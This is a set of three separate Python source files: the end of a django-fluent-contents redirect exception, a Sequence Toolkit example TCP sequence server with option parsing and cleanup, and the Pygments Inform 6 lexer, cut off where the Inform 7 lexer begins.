    Raised by a plugin to request that the user be redirected.
    """

    def __init__(self, url, status=302):
        message = (
            "A redirect to '{0}' was requested by a plugin.\n"
            "Please add 'fluent_contents.middleware.HttpRedirectRequestMiddleware' "
            "to MIDDLEWARE_CLASSES to handle redirects by plugins.".format(url)
        )
        super(HttpRedirectRequest, self).__init__(message)
        # Kept as attributes so the middleware can build the real response.
        self.url = url
        self.status = status
|
|
# Copyright Dave Trollope 2014
# This source code is not to be distributed without agreement from
# D. Trollope
#
# This example demonstrates how to code up a simple sequence server
# which accepts connections using the TCP data flow module,
# manages a service group and responds to sequences
# from a client.
# System imports
import getopt, sys, time, random
# Sequence Toolkit imports - stk_env must be first
from stk_env import *
from stk_options import *
from stk_service_group import *
from stk_service import *
from stk_tcp_server import *
from stk_data_flow import *
from stk_sg_automation import *
# Add a handler for CTRL-C to gracefully exit
import signal
import sys
# Number of CTRL-C presses seen so far; the second press forces an exit.
ending = 0
def signal_handler(signal, frame):
    # NOTE(review): the `signal` parameter shadows the `signal` module inside
    # this handler; only the module-level registration below uses the module.
    global ending
    if ending > 0:
        # Second CTRL-C: give up waiting for a graceful shutdown.
        sys.exit(0)
    ending += 1
    # First CTRL-C: ask the dispatcher (stkbase is assigned later at module
    # level) to stop so the script falls through to cleanup().
    stkbase.stop_dispatcher()
    stkbase.terminate_dispatcher()
signal.signal(signal.SIGINT, signal_handler)
# Class to collect command line options
# command line options provided - set in process_cmdline()
class cmdopts:
    """Default command line settings; overwritten by process_cmdline()."""
    # Service group identity / verbosity
    group_name = "Simple Server Service Group"
    quiet = False
    # Listening endpoint for client connections (-B)
    bind_ip = "0.0.0.0"
    bind_port = "29312"
    # Monitoring service endpoint (-m)
    monitor_ip = "127.0.0.1"
    monitor_port = "20001"
    monitor_protocol = "tcp"
    # Name server endpoint (-R)
    name_server_ip = "127.0.0.1"
    name_server_port = "20002"
    name_server_protocol = "tcp"
# Module-level options instance; process_cmdline() mutates it in place.
opts = cmdopts()
# Process command line options
def process_cmdline():
    """Parse sys.argv and store the results on the module-level ``opts``.

    Recognized options: -h/--help, -q/--quiet, -G/--group-name,
    -B ip[:port], -m [protocol:]ip[:port], -R [protocol:]ip[:port].
    Exits with status 2 on a malformed command line.
    """
    try:
        gopts, args = getopt.getopt(sys.argv[1:], "hqG:B:m:R:",
                                    ["help", "quiet", "group-name="])
    except getopt.GetoptError:
        # print help information and exit:
        usage()
        sys.exit(2)
    for o, a in gopts:
        if o in ("-q", "--quiet"):
            opts.quiet = True
        elif o in ("-h", "--help"):
            usage()
            sys.exit()
        elif o == "-B":
            # Accept "ip" or "ip:port".
            parts = a.split(':')
            opts.bind_ip = parts[0]
            # BUG FIX: this previously read `parts.count == 2`, comparing the
            # bound list method to an int (always False), so an explicit
            # ":port" suffix was silently ignored.
            if len(parts) == 2:
                opts.bind_port = parts[1]
        elif o in ("-G", "--group-name"):
            opts.group_name = a
        elif o == "-m":
            # Let the STK helper split "[protocol:]ip[:port]"; only
            # overwrite defaults for the pieces actually supplied.
            p = stk_protocol_def_t()
            a = stk_data_flow_parse_protocol_str(p, a)
            if p.ip != '':
                opts.monitor_ip = p.ip
            if p.port != '':
                opts.monitor_port = p.port
            if p.protocol != '':
                opts.monitor_protocol = p.protocol
        elif o == "-R":
            p = stk_protocol_def_t()
            a = stk_data_flow_parse_protocol_str(p, a)
            if p.ip != '':
                opts.name_server_ip = p.ip
            if p.port != '':
                opts.name_server_port = p.port
            if p.protocol != '':
                opts.name_server_protocol = p.protocol
def usage():
    """Print the command line help for simple_server.py to stdout."""
    for line in (
        "Usage: simple_server.py [options]",
        "   -h : This help!",
        "   -q : Quiet",
        "   -B ip[:port] : IP and port to be bound (default: 0.0.0.0:29312)",
        "   -G <name> : Group Name for services",
        "   -m <[protocol:]ip[:port]> : IP and port of monitor",
        "   -R <[protocol:]ip[:port]> : IP and port of name server",
    ):
        print(line)
# Process command line options
process_cmdline()
# The following are used during cleanup.  They are pre-declared as None so
# cleanup() can run safely no matter how far initialization progressed
# before a failure.
df = None              # server (listening) data flow
df_opts = None         # options for the server data flow
svcgrp = None          # service group for connecting clients
svcgrp_opts = None     # options for the service group
stkbase = None         # the STK environment
envopts = None         # options used to create the environment
dispatcher_cbs = None  # dispatcher callback object
service_cbs = None     # service event callback object
def cleanup():
    # Tear everything down in roughly the reverse order of creation.
    # Each object is guarded by an `if`, so this is safe to call at any
    # stage of initialization (the globals start out as None).
    try:
        # destroy the data flow, sequence, service group and environment
        if df:
            df.close()
        if df_opts:
            df_opts.remove_dispatcher_fd_cbs()
            df_opts.close()
        if svcgrp:
            svcgrp.close()
        if svcgrp_opts:
            # Unhook the service callbacks and listening data flow before
            # freeing the option set they were attached to.
            stk_service_group.remove_service_cb_option(stkbase,svcgrp_opts,service_cbs)
            svcgrp_opts.remove_data_flow("listening_data_flow")
            svcgrp_opts.close()
        # Close the callback objects
        if service_cbs:
            service_cbs.close()
        # And get rid of the environment, we are done!
        if stkbase:
            stkbase.close()
        if dispatcher_cbs:
            #dispatcher_cbs.caller().close()
            dispatcher_cbs.close()
        if envopts:
            # Now free the options that were built
            # Because there was nested options, we must free each nest individually
            # because there is no stored indication which options are nested
            envopts.remove_dispatcher_wakeup_cb()
            nsopts = envopts.find_option("name_server_options")
            stk_env.remove_name_server_dispatcher_cbs(nsopts,"name_server_data_flow")
            nsopts.free_sub_option("name_server_data_flow_options")
            stk_env.remove_monitoring_dispatcher_cbs(envopts,"monitoring_data_flow")
            envopts.free_sub_option("monitoring_data_flow_options")
            envopts.free_sub_option("name_server_options")
            envopts.close()
    except Exception, e:
        # Best effort teardown: report but never raise out of cleanup().
        print "Exception occurred cleaning up: " + str(e)
# Create the STK environment - can't do anything without one
# By configuring the IP/Port of the monitoring service when we create the environment
# all services created within it will automatically use the monitoring service unless
# overridden.
# The nested dicts mirror the STK option tree: a name-server section plus
# top-level monitoring settings, each with its own data flow options.
opts_dict = {
    "name_server_options": {
        "name_server_data_flow_protocol": opts.name_server_protocol,
        "name_server_data_flow_options": {
            "data_flow_name": """%(protocol)s name server socket for simple_server""" % {"protocol": opts.name_server_protocol },
            "data_flow_id": 10000,
            "destination_address": opts.name_server_ip,
            "destination_port": opts.name_server_port
        }
    },
    "monitoring_data_flow_protocol": opts.monitor_protocol,
    "monitoring_data_flow_options": {
        "data_flow_name": """%(protocol)s monitoring socket for simple_server""" % {"protocol": opts.monitor_protocol },
        "data_flow_id": 10001,
        "destination_address": opts.monitor_ip,
        "destination_port": opts.monitor_port,
        "nodelay": 1
    }
}
envopts = stk_options(opts_dict)
# Let the environment automatically add and remove fds for these data flows to the dispatcher
stk_env.append_name_server_dispatcher_cbs(envopts,"name_server_data_flow")
stk_env.append_monitoring_dispatcher_cbs(envopts,"monitoring_data_flow")
# Create an STK environment. Since we are using the example listening dispatcher,
# set an option for the environment to ensure the dispatcher wakeup API is called.
envopts.append_dispatcher_wakeup_cb()
stkbase = stk_env(envopts)
# Class containing callbacks for services (added, removed and changing state)
class app_service_cb(stk_callback):
    def __init__(self):
        stk_callback.__init__(self)
    def close(self):
        stk_callback.close(self)
    def added_cb(self,svcgrp,svc,state): # Service added callback
        print "Service " + svc.name() + " added to service group " + svcgrp.name() + " [state " + str(state) + "]"
    def removed_cb(self,svcgrp,svc,state): # Service removed callback
        print "Service " + svc.name() + " removed from service group " + svcgrp.name() + " [state " + str(state) + "]"
    def state_change_cb(self,svc,old_state,new_state): # Service changing state callback
        old_state_str = svc.state_str(old_state);
        new_state_str = svc.state_str(new_state);
        print "Service '" + svc.name() + "' changed from state " + str(old_state_str) + " to " + str(new_state_str);
    def smartbeat_cb(self,svcgrp,svc,smartbeat):
        # Periodic liveness notification from a client service; wrapped in
        # try/except so a bad smartbeat object cannot kill the dispatcher.
        try:
            print "Service '" + svc.name() + "' group '" + svcgrp.name() + "' smartbeat received, checkpoint " + str(smartbeat.checkpoint())
        except Exception, e:
            print str(e)
# Class containing callbacks for the dispatcher - this is how we receive data
class dispatcher_cb(stk_callback):
    def __init__(self):
        stk_callback.__init__(self)
    def close(self):
        stk_callback.close(self)
    def process_seq_segment(self,seq,data,user_type,clientd):
        # Called (via rcv_seq.iterate) once per element of a received
        # sequence; prints a short summary plus first/last bytes.
        if opts.quiet == False:
            print "Sequence " + str(seq.id()) + " Received " + str(len(data)) + " bytes of type " + str(user_type)
            if len(data) >= 4:
                sz = len(data)
                print 'Bytes: %02x %02x %02x %02x ... %02x %02x %02x %02x' % (ord(data[0]),ord(data[1]),ord(data[2]),ord(data[3]),ord(data[sz - 4]),ord(data[sz - 3]),ord(data[sz - 2]),ord(data[sz - 1]))
    # Class-level counter used as the sequence-generation value for replies.
    num = 0
    def process_data(self,rcvchannel,rcv_seq): # Callback to receive data
        try:
            # Non-data sequences (service state traffic) are handed to the
            # service group for processing, then skipped below.
            if rcv_seq.type() != STK_SEQUENCE_TYPE_DATA:
                svcgrp.invoke(rcv_seq)
            if opts.quiet == False:
                print "data flow " + str(rcvchannel.id()) + ": Number of elements in received sequence: " + str(rcv_seq.count()) + " Sequence type: " + str(rcv_seq.type())
            if rcv_seq.type() != STK_SEQUENCE_TYPE_DATA:
                return
            # Call process_seq_segment() on each element in the sequence
            rcv_seq.iterate(self.process_seq_segment,None)
        except Exception, e:
            print "Exception occurred processing received data: " + str(e)
        try:
            # Echo a small 10-integer sequence back to the client,
            # stamped with the shared class counter.
            ret_seq = stk_sequence(rcv_seq.env(),"simple_server_return_data",0x7edcba90,STK_SEQUENCE_TYPE_DATA,STK_SERVICE_TYPE_DATA,None)
            retbuf = []
            i = 0
            while i < 10:
                retbuf.append(i)
                i += 1
            ret_seq.copy_array_to(retbuf,self.__class__.num);
            self.__class__.num += 1
            rcvchannel.send(ret_seq,STK_TCP_SEND_FLAG_NONBLOCK)
        except Exception, e:
            print "Exception occurred returning data: " + str(e)
    def process_name_response(self,rcvchannel,rcv_seq): # Callback to receive name info
        # Name lookups are not used by this example server.
        pass
try:
    # Create the options for the server data flow
    print "Creating server data flow"
    df_opts_dict = {
        "bind_address": opts.bind_ip,
        "bind_port": opts.bind_port,
        "nodelay": 1,
        "send_buffer_size": 800000,
        "receive_buffer_size": 16000000,
        "reuseaddr": 1
    }
    df_opts = stk_options(df_opts_dict)
    df_opts.append_dispatcher_fd_cbs(None)
    # Create the TCP server data flow (aka a listening socket)
    # NOTE(review): 29190 is presumably the data flow id (the bind address
    # and port come from df_opts above) - confirm against the STK API.
    df = stk_tcp_server(stkbase,"tcp server socket for simple_server", 29190, df_opts)
    if df == None:
        print "Failed to create the server data flow"
        cleanup()
        sys.exit(5)
except Exception, e:
    print "Exception occurred trying to create server data flow: " + str(e)
    cleanup()
    sys.exit(5)
print "Server data flow created"
try:
    # Create service callbacks object and add to service group options
    service_cbs = app_service_cb()
    svcgrp_opts = stk_options("")
    svcgrp_opts.append_data_flow("listening_data_flow",df)
    svccb = stk_service_group.add_service_cb_option(stkbase,svcgrp_opts,service_cbs)
    # Create the service group that client services will be added to as they are discovered.
    # Also, register callbacks so we can be notified when services are added and removed.
    svcgrp = stk_service_group(stkbase, opts.group_name, 1000, svcgrp_opts)
except Exception, e:
    print "Exception occurred trying to create service group: " + str(e)
    cleanup()
    sys.exit(5)
try:
    # Run the example listening dispatcher to accept data flows from clients
    # and receive data from them. This example does this inline, but an
    # application might choose to invoke this on another thread.
    #
    # The dispatcher only returns when a shutdown is detected.
    dispatcher_cbs = dispatcher_cb()
    stkbase.listening_dispatcher(df,svcgrp,dispatcher_cbs)
except Exception, e:
    print "Exception occurred dispatching: " + str(e)
# The dispatcher returned, cleanup everything
cleanup()
|
|
# -*- coding: utf-8 -*-
"""
pygments.lexers.int_fiction
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Lexers for interactive fiction languages.
:copyright: Copyright 2006-2015 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, include, bygroups, using, \
this, default, words
from pygments.token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation, Error, Generic
__all__ = ['Inform6Lexer', 'Inform6TemplateLexer', 'Inform7Lexer',
'Tads3Lexer']
class Inform6Lexer(RegexLexer):
    """
    For `Inform 6 <http://inform-fiction.org/>`_ source code.
    .. versionadded:: 2.0
    """
    name = 'Inform 6'
    aliases = ['inform6', 'i6']
    filenames = ['*.inf']
    flags = re.MULTILINE | re.DOTALL | re.UNICODE
    _name = r'[a-zA-Z_]\w*'
    # Inform 7 maps these four character classes to their ASCII
    # equivalents. To support Inform 6 inclusions within Inform 7,
    # Inform6Lexer maps them too.
    _dash = u'\\-\u2010-\u2014'
    _dquote = u'"\u201c\u201d'
    _squote = u"'\u2018\u2019"
    _newline = u'\\n\u0085\u2028\u2029'
    # State-machine token table.  States whose names start with '_' are
    # pure helpers meant for include()/push, never entered from 'root'.
    tokens = {
        'root': [
            (r'\A(!%%[^%s]*[%s])+' % (_newline, _newline), Comment.Preproc,
             'directive'),
            default('directive')
        ],
        '_whitespace': [
            (r'\s+', Text),
            (r'![^%s]*' % _newline, Comment.Single)
        ],
        'default': [
            include('_whitespace'),
            (r'\[', Punctuation, 'many-values'),  # Array initialization
            (r':|(?=;)', Punctuation, '#pop'),
            (r'<', Punctuation),  # Second angle bracket in an action statement
            default(('expression', '_expression'))
        ],
        # Expressions
        '_expression': [
            include('_whitespace'),
            (r'(?=sp\b)', Text, '#pop'),
            (r'(?=[%s%s$0-9#a-zA-Z_])' % (_dquote, _squote), Text,
             ('#pop', 'value')),
            (r'\+\+|[%s]{1,2}(?!>)|~~?' % _dash, Operator),
            (r'(?=[()\[%s,?@{:;])' % _dash, Text, '#pop')
        ],
        'expression': [
            include('_whitespace'),
            (r'\(', Punctuation, ('expression', '_expression')),
            (r'\)', Punctuation, '#pop'),
            (r'\[', Punctuation, ('#pop', 'statements', 'locals')),
            (r'>(?=(\s+|(![^%s]*))*[>;])' % _newline, Punctuation),
            (r'\+\+|[%s]{2}(?!>)' % _dash, Operator),
            (r',', Punctuation, '_expression'),
            (r'&&?|\|\|?|[=~><]?=|[%s]{1,2}>?|\.\.?[&#]?|::|[<>+*/%%]' % _dash,
             Operator, '_expression'),
            (r'(has|hasnt|in|notin|ofclass|or|provides)\b', Operator.Word,
             '_expression'),
            (r'sp\b', Name),
            (r'\?~?', Name.Label, 'label?'),
            (r'[@{]', Error),
            default('#pop')
        ],
        '_assembly-expression': [
            (r'\(', Punctuation, ('#push', '_expression')),
            (r'[\[\]]', Punctuation),
            (r'[%s]>' % _dash, Punctuation, '_expression'),
            (r'sp\b', Keyword.Pseudo),
            (r';', Punctuation, '#pop:3'),
            include('expression')
        ],
        '_for-expression': [
            (r'\)', Punctuation, '#pop:2'),
            (r':', Punctuation, '#pop'),
            include('expression')
        ],
        '_keyword-expression': [
            (r'(from|near|to)\b', Keyword, '_expression'),
            include('expression')
        ],
        '_list-expression': [
            (r',', Punctuation, '#pop'),
            include('expression')
        ],
        '_object-expression': [
            (r'has\b', Keyword.Declaration, '#pop'),
            include('_list-expression')
        ],
        # Values
        'value': [
            include('_whitespace'),
            # Strings
            (r'[%s][^@][%s]' % (_squote, _squote), String.Char, '#pop'),
            (r'([%s])(@\{[0-9a-fA-F]{1,4}\})([%s])' % (_squote, _squote),
             bygroups(String.Char, String.Escape, String.Char), '#pop'),
            (r'([%s])(@.{2})([%s])' % (_squote, _squote),
             bygroups(String.Char, String.Escape, String.Char), '#pop'),
            (r'[%s]' % _squote, String.Single, ('#pop', 'dictionary-word')),
            (r'[%s]' % _dquote, String.Double, ('#pop', 'string')),
            # Numbers
            (r'\$[+%s][0-9]*\.?[0-9]*([eE][+%s]?[0-9]+)?' % (_dash, _dash),
             Number.Float, '#pop'),
            (r'\$[0-9a-fA-F]+', Number.Hex, '#pop'),
            (r'\$\$[01]+', Number.Bin, '#pop'),
            (r'[0-9]+', Number.Integer, '#pop'),
            # Values prefixed by hashes
            (r'(##|#a\$)(%s)' % _name, bygroups(Operator, Name), '#pop'),
            (r'(#g\$)(%s)' % _name,
             bygroups(Operator, Name.Variable.Global), '#pop'),
            (r'#[nw]\$', Operator, ('#pop', 'obsolete-dictionary-word')),
            (r'(#r\$)(%s)' % _name, bygroups(Operator, Name.Function), '#pop'),
            (r'#', Name.Builtin, ('#pop', 'system-constant')),
            # System functions
            (words((
                'child', 'children', 'elder', 'eldest', 'glk', 'indirect', 'metaclass',
                'parent', 'random', 'sibling', 'younger', 'youngest'), suffix=r'\b'),
             Name.Builtin, '#pop'),
            # Metaclasses
            (r'(?i)(Class|Object|Routine|String)\b', Name.Builtin, '#pop'),
            # Veneer routines
            (words((
                'Box__Routine', 'CA__Pr', 'CDefArt', 'CInDefArt', 'Cl__Ms',
                'Copy__Primitive', 'CP__Tab', 'DA__Pr', 'DB__Pr', 'DefArt', 'Dynam__String',
                'EnglishNumber', 'Glk__Wrap', 'IA__Pr', 'IB__Pr', 'InDefArt', 'Main__',
                'Meta__class', 'OB__Move', 'OB__Remove', 'OC__Cl', 'OP__Pr', 'Print__Addr',
                'Print__PName', 'PrintShortName', 'RA__Pr', 'RA__Sc', 'RL__Pr', 'R_Process',
                'RT__ChG', 'RT__ChGt', 'RT__ChLDB', 'RT__ChLDW', 'RT__ChPR', 'RT__ChPrintA',
                'RT__ChPrintC', 'RT__ChPrintO', 'RT__ChPrintS', 'RT__ChPS', 'RT__ChR',
                'RT__ChSTB', 'RT__ChSTW', 'RT__ChT', 'RT__Err', 'RT__TrPS', 'RV__Pr',
                'Symb__Tab', 'Unsigned__Compare', 'WV__Pr', 'Z__Region'),
                prefix='(?i)', suffix=r'\b'),
             Name.Builtin, '#pop'),
            # Other built-in symbols
            (words((
                'call', 'copy', 'create', 'DEBUG', 'destroy', 'DICT_CHAR_SIZE',
                'DICT_ENTRY_BYTES', 'DICT_IS_UNICODE', 'DICT_WORD_SIZE', 'false',
                'FLOAT_INFINITY', 'FLOAT_NAN', 'FLOAT_NINFINITY', 'GOBJFIELD_CHAIN',
                'GOBJFIELD_CHILD', 'GOBJFIELD_NAME', 'GOBJFIELD_PARENT',
                'GOBJFIELD_PROPTAB', 'GOBJFIELD_SIBLING', 'GOBJ_EXT_START',
                'GOBJ_TOTAL_LENGTH', 'Grammar__Version', 'INDIV_PROP_START', 'INFIX',
                'infix__watching', 'MODULE_MODE', 'name', 'nothing', 'NUM_ATTR_BYTES', 'print',
                'print_to_array', 'recreate', 'remaining', 'self', 'sender', 'STRICT_MODE',
                'sw__var', 'sys__glob0', 'sys__glob1', 'sys__glob2', 'sys_statusline_flag',
                'TARGET_GLULX', 'TARGET_ZCODE', 'temp__global2', 'temp__global3',
                'temp__global4', 'temp_global', 'true', 'USE_MODULES', 'WORDSIZE'),
                prefix='(?i)', suffix=r'\b'),
             Name.Builtin, '#pop'),
            # Other values
            (_name, Name, '#pop')
        ],
        # Strings
        'dictionary-word': [
            (r'[~^]+', String.Escape),
            (r'[^~^\\@({%s]+' % _squote, String.Single),
            (r'[({]', String.Single),
            (r'@\{[0-9a-fA-F]{,4}\}', String.Escape),
            (r'@.{2}', String.Escape),
            (r'[%s]' % _squote, String.Single, '#pop')
        ],
        'string': [
            (r'[~^]+', String.Escape),
            (r'[^~^\\@({%s]+' % _dquote, String.Double),
            (r'[({]', String.Double),
            (r'\\', String.Escape),
            (r'@(\\\s*[%s]\s*)*@((\\\s*[%s]\s*)*[0-9])*' %
             (_newline, _newline), String.Escape),
            (r'@(\\\s*[%s]\s*)*\{((\\\s*[%s]\s*)*[0-9a-fA-F]){,4}'
             r'(\\\s*[%s]\s*)*\}' % (_newline, _newline, _newline),
             String.Escape),
            (r'@(\\\s*[%s]\s*)*.(\\\s*[%s]\s*)*.' % (_newline, _newline),
             String.Escape),
            (r'[%s]' % _dquote, String.Double, '#pop')
        ],
        'plain-string': [
            (r'[^~^\\({\[\]%s]+' % _dquote, String.Double),
            (r'[~^({\[\]]', String.Double),
            (r'\\', String.Escape),
            (r'[%s]' % _dquote, String.Double, '#pop')
        ],
        # Names
        '_constant': [
            include('_whitespace'),
            (_name, Name.Constant, '#pop'),
            include('value')
        ],
        '_global': [
            include('_whitespace'),
            (_name, Name.Variable.Global, '#pop'),
            include('value')
        ],
        'label?': [
            include('_whitespace'),
            (_name, Name.Label, '#pop'),
            default('#pop')
        ],
        'variable?': [
            include('_whitespace'),
            (_name, Name.Variable, '#pop'),
            default('#pop')
        ],
        # Values after hashes
        'obsolete-dictionary-word': [
            (r'\S\w*', String.Other, '#pop')
        ],
        'system-constant': [
            include('_whitespace'),
            (_name, Name.Builtin, '#pop')
        ],
        # Directives
        'directive': [
            include('_whitespace'),
            (r'#', Punctuation),
            (r';', Punctuation, '#pop'),
            (r'\[', Punctuation,
             ('default', 'statements', 'locals', 'routine-name?')),
            (words((
                'abbreviate', 'endif', 'dictionary', 'ifdef', 'iffalse', 'ifndef', 'ifnot',
                'iftrue', 'ifv3', 'ifv5', 'release', 'serial', 'switches', 'system_file',
                'version'), prefix='(?i)', suffix=r'\b'),
             Keyword, 'default'),
            (r'(?i)(array|global)\b', Keyword,
             ('default', 'directive-keyword?', '_global')),
            (r'(?i)attribute\b', Keyword, ('default', 'alias?', '_constant')),
            (r'(?i)class\b', Keyword,
             ('object-body', 'duplicates', 'class-name')),
            (r'(?i)(constant|default)\b', Keyword,
             ('default', 'expression', '_constant')),
            (r'(?i)(end\b)(.*)', bygroups(Keyword, Text)),
            (r'(?i)(extend|verb)\b', Keyword, 'grammar'),
            (r'(?i)fake_action\b', Keyword, ('default', '_constant')),
            (r'(?i)import\b', Keyword, 'manifest'),
            (r'(?i)(include|link)\b', Keyword,
             ('default', 'before-plain-string')),
            (r'(?i)(lowstring|undef)\b', Keyword, ('default', '_constant')),
            (r'(?i)message\b', Keyword, ('default', 'diagnostic')),
            (r'(?i)(nearby|object)\b', Keyword,
             ('object-body', '_object-head')),
            (r'(?i)property\b', Keyword,
             ('default', 'alias?', '_constant', 'property-keyword*')),
            (r'(?i)replace\b', Keyword,
             ('default', 'routine-name?', 'routine-name?')),
            (r'(?i)statusline\b', Keyword, ('default', 'directive-keyword?')),
            (r'(?i)stub\b', Keyword, ('default', 'routine-name?')),
            (r'(?i)trace\b', Keyword,
             ('default', 'trace-keyword?', 'trace-keyword?')),
            (r'(?i)zcharacter\b', Keyword,
             ('default', 'directive-keyword?', 'directive-keyword?')),
            (_name, Name.Class, ('object-body', '_object-head'))
        ],
        # [, Replace, Stub
        'routine-name?': [
            include('_whitespace'),
            (_name, Name.Function, '#pop'),
            default('#pop')
        ],
        'locals': [
            include('_whitespace'),
            (r';', Punctuation, '#pop'),
            (r'\*', Punctuation),
            (_name, Name.Variable)
        ],
        # Array
        'many-values': [
            include('_whitespace'),
            (r';', Punctuation),
            (r'\]', Punctuation, '#pop'),
            (r':', Error),
            default(('expression', '_expression'))
        ],
        # Attribute, Property
        'alias?': [
            include('_whitespace'),
            (r'alias\b', Keyword, ('#pop', '_constant')),
            default('#pop')
        ],
        # Class, Object, Nearby
        'class-name': [
            include('_whitespace'),
            (r'(?=[,;]|(class|has|private|with)\b)', Text, '#pop'),
            (_name, Name.Class, '#pop')
        ],
        'duplicates': [
            include('_whitespace'),
            (r'\(', Punctuation, ('#pop', 'expression', '_expression')),
            default('#pop')
        ],
        '_object-head': [
            (r'[%s]>' % _dash, Punctuation),
            (r'(class|has|private|with)\b', Keyword.Declaration, '#pop'),
            include('_global')
        ],
        'object-body': [
            include('_whitespace'),
            (r';', Punctuation, '#pop:2'),
            (r',', Punctuation),
            (r'class\b', Keyword.Declaration, 'class-segment'),
            (r'(has|private|with)\b', Keyword.Declaration),
            (r':', Error),
            default(('_object-expression', '_expression'))
        ],
        'class-segment': [
            include('_whitespace'),
            (r'(?=[,;]|(class|has|private|with)\b)', Text, '#pop'),
            (_name, Name.Class),
            default('value')
        ],
        # Extend, Verb
        'grammar': [
            include('_whitespace'),
            (r'=', Punctuation, ('#pop', 'default')),
            (r'\*', Punctuation, ('#pop', 'grammar-line')),
            default('_directive-keyword')
        ],
        'grammar-line': [
            include('_whitespace'),
            (r';', Punctuation, '#pop'),
            (r'[/*]', Punctuation),
            (r'[%s]>' % _dash, Punctuation, 'value'),
            (r'(noun|scope)\b', Keyword, '=routine'),
            default('_directive-keyword')
        ],
        '=routine': [
            include('_whitespace'),
            (r'=', Punctuation, 'routine-name?'),
            default('#pop')
        ],
        # Import
        'manifest': [
            include('_whitespace'),
            (r';', Punctuation, '#pop'),
            (r',', Punctuation),
            (r'(?i)global\b', Keyword, '_global'),
            default('_global')
        ],
        # Include, Link, Message
        'diagnostic': [
            include('_whitespace'),
            (r'[%s]' % _dquote, String.Double, ('#pop', 'message-string')),
            default(('#pop', 'before-plain-string', 'directive-keyword?'))
        ],
        'before-plain-string': [
            include('_whitespace'),
            (r'[%s]' % _dquote, String.Double, ('#pop', 'plain-string'))
        ],
        'message-string': [
            (r'[~^]+', String.Escape),
            include('plain-string')
        ],
        # Keywords used in directives
        '_directive-keyword!': [
            include('_whitespace'),
            (words((
                'additive', 'alias', 'buffer', 'class', 'creature', 'data', 'error', 'fatalerror',
                'first', 'has', 'held', 'initial', 'initstr', 'last', 'long', 'meta', 'multi',
                'multiexcept', 'multiheld', 'multiinside', 'noun', 'number', 'only', 'private',
                'replace', 'reverse', 'scope', 'score', 'special', 'string', 'table', 'terminating',
                'time', 'topic', 'warning', 'with'), suffix=r'\b'),
             Keyword, '#pop'),
            (r'[%s]{1,2}>|[+=]' % _dash, Punctuation, '#pop')
        ],
        '_directive-keyword': [
            include('_directive-keyword!'),
            include('value')
        ],
        'directive-keyword?': [
            include('_directive-keyword!'),
            default('#pop')
        ],
        'property-keyword*': [
            include('_whitespace'),
            (r'(additive|long)\b', Keyword),
            default('#pop')
        ],
        'trace-keyword?': [
            include('_whitespace'),
            (words((
                'assembly', 'dictionary', 'expressions', 'lines', 'linker',
                'objects', 'off', 'on', 'symbols', 'tokens', 'verbs'), suffix=r'\b'),
             Keyword, '#pop'),
            default('#pop')
        ],
        # Statements
        'statements': [
            include('_whitespace'),
            (r'\]', Punctuation, '#pop'),
            (r'[;{}]', Punctuation),
            (words((
                'box', 'break', 'continue', 'default', 'give', 'inversion',
                'new_line', 'quit', 'read', 'remove', 'return', 'rfalse', 'rtrue',
                'spaces', 'string', 'until'), suffix=r'\b'),
             Keyword, 'default'),
            (r'(do|else)\b', Keyword),
            (r'(font|style)\b', Keyword,
             ('default', 'miscellaneous-keyword?')),
            (r'for\b', Keyword, ('for', '(?')),
            (r'(if|switch|while)', Keyword,
             ('expression', '_expression', '(?')),
            (r'(jump|save|restore)\b', Keyword, ('default', 'label?')),
            (r'objectloop\b', Keyword,
             ('_keyword-expression', 'variable?', '(?')),
            (r'print(_ret)?\b|(?=[%s])' % _dquote, Keyword, 'print-list'),
            (r'\.', Name.Label, 'label?'),
            (r'@', Keyword, 'opcode'),
            (r'#(?![agrnw]\$|#)', Punctuation, 'directive'),
            (r'<', Punctuation, 'default'),
            (r'move\b', Keyword,
             ('default', '_keyword-expression', '_expression')),
            default(('default', '_keyword-expression', '_expression'))
        ],
        'miscellaneous-keyword?': [
            include('_whitespace'),
            (r'(bold|fixed|from|near|off|on|reverse|roman|to|underline)\b',
             Keyword, '#pop'),
            (r'(a|A|an|address|char|name|number|object|property|string|the|'
             r'The)\b(?=(\s+|(![^%s]*))*\))' % _newline, Keyword.Pseudo,
             '#pop'),
            (r'%s(?=(\s+|(![^%s]*))*\))' % (_name, _newline), Name.Function,
             '#pop'),
            default('#pop')
        ],
        '(?': [
            include('_whitespace'),
            (r'\(', Punctuation, '#pop'),
            default('#pop')
        ],
        'for': [
            include('_whitespace'),
            (r';', Punctuation, ('_for-expression', '_expression')),
            default(('_for-expression', '_expression'))
        ],
        'print-list': [
            include('_whitespace'),
            (r';', Punctuation, '#pop'),
            (r':', Error),
            default(('_list-expression', '_expression', '_list-expression', 'form'))
        ],
        'form': [
            include('_whitespace'),
            (r'\(', Punctuation, ('#pop', 'miscellaneous-keyword?')),
            default('#pop')
        ],
        # Assembly
        'opcode': [
            include('_whitespace'),
            (r'[%s]' % _dquote, String.Double, ('operands', 'plain-string')),
            (_name, Keyword, 'operands')
        ],
        'operands': [
            (r':', Error),
            default(('_assembly-expression', '_expression'))
        ]
    }

    def get_tokens_unprocessed(self, text):
        """Tokenize, then retroactively reclassify ``in`` as a keyword when
        it appears inside an ``objectloop(a in b)`` header."""
        # 'in' is either a keyword or an operator.
        # If the token two tokens after 'in' is ')', 'in' is a keyword:
        #   objectloop(a in b)
        # Otherwise, it is an operator:
        #   objectloop(a in b && true)
        objectloop_queue = []
        objectloop_token_count = -1
        previous_token = None
        for index, token, value in RegexLexer.get_tokens_unprocessed(self,
                                                                     text):
            if previous_token is Name.Variable and value == 'in':
                # Hold back 'in' and the next two significant tokens until
                # we can see whether a ')' closes the header.
                objectloop_queue = [[index, token, value]]
                objectloop_token_count = 2
            elif objectloop_token_count > 0:
                if token not in Comment and token not in Text:
                    objectloop_token_count -= 1
                objectloop_queue.append((index, token, value))
            else:
                if objectloop_token_count == 0:
                    if objectloop_queue[-1][2] == ')':
                        objectloop_queue[0][1] = Keyword
                    while objectloop_queue:
                        yield objectloop_queue.pop(0)
                    objectloop_token_count = -1
                yield index, token, value
            if token not in Comment and token not in Text:
                previous_token = token
        # Flush anything still buffered at end of input.
        while objectloop_queue:
            yield objectloop_queue.pop(0)
class Inform7Lexer(RegexLexer):
    """
    For `Inform 7 <http://inform7.com/>`_ source code.
    .. versionadded:: 2.0
    """
    name = 'Inform 7'
    aliases = ['inform7', 'i7']
    filenames = ['*.ni', '*.i7x']
